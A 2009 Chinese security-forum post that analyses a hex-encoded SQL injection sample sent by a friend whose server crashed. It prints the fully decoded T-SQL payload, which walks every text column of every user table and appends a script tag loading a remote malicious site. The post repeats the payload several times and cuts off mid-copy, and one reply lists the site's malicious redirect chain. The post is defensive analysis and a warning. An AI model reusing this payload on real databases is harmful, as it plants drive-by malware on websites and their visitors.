吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 5517|回复: 7
收起左侧

[PC样本分析] 一个数据库挂马的例子

[复制链接]
frozenrain 发表于 2009-10-27 16:55
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
今天朋友发给我一段数据说服务器崩了,让我给分析一下,加密数据见附件。
打开文件,发现是以%隔开的,很明显是16进制,把16进制转化为字符串后得到。
;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C00610072006500200040005400200056006............省略)
很明显是SQL挂马,中间那段数据没解出来,凭经验以0x开头的数据也是16进制的,转化为字符看看。
中间数据解码后,得到最终结果:
;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor aS NvArChAR(4000));ExEc(@S);--@S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor aS NvArChAR(4000));ExEc(@S);--@S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor aS NvArChAR(4000));ExEc(@S);--@S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor aS NvArChAR(4000));ExEc(@S);--@S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<scri


数据库中被插入了<script src=http://z360.net></script>',google一下z360.net 发现最近被这个挂马的站很多。
提醒大家注意。

encode.txt

61.64 KB, 下载次数: 5, 下载积分: 吾爱币 -1 CB

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Hmily 发表于 2009-10-27 17:07
太深奥了,这个不懂。。。学习。。。
xiaopeng018 发表于 2009-10-27 17:29
Log is generated by FreShow.
[wide]http://z360.net
    [frame]http://z360.net/0.htm
        [frame]http://ddyyb.2288.org/fkzd/16.htm  //连接超时
    [script]http://js.tongji.linezing.com/464215/tongji.js
kongzi 发表于 2009-11-1 20:12
这个应该是个存储过程吧,里面用到了数据库的指针
mycsy 发表于 2009-11-1 20:29
没好好格式化下代码 本事不行这么看老费劲
xieyuzhe 发表于 2009-11-4 16:13
这个高手了,就这样也看懂了
muye 发表于 2009-11-4 20:02
无法学习,只能膜拜,能提供原始样本不?
头像被屏蔽
miaoronghua 发表于 2009-12-2 13:46
提示: 作者被禁止或删除 内容自动屏蔽
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-4-30 08:47

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表